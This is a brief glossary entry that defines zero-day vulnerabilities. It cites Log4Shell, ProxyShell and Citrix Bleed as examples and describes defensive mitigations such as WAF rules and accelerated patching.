Zero-Day

A zero-day is a vulnerability that is being exploited (or whose details are public) before the vendor has issued a patch.

Definition

"Zero-day" refers to a vulnerability for which the vendor has had zero days of notice — exploitation, or full technical disclosure, predates any official fix. The shorthand "0-day" is identical. Zero-days are the highest-urgency category for defenders because no upstream patch exists; mitigation depends on workarounds (configuration changes, WAF rules, disabling features) and on detection.

Zero-days that are exploited at scale (Log4Shell on day one, Microsoft Exchange's ProxyShell chains, Citrix Bleed) routinely cause widespread breach activity in the gap between exploitation and patch availability. The CISA KEV catalog is one of the fastest signals that a vulnerability has been observed in-the-wild.

Mitigation

Class-specific. Defenders rely on virtual patching (WAF / IDS signatures), defence-in-depth, and accelerated patching of the eventual fix.

Examples

  • CVE-2021-44228 — Log4Shell, exploited in the wild before the patch was widely deployed.

See also

References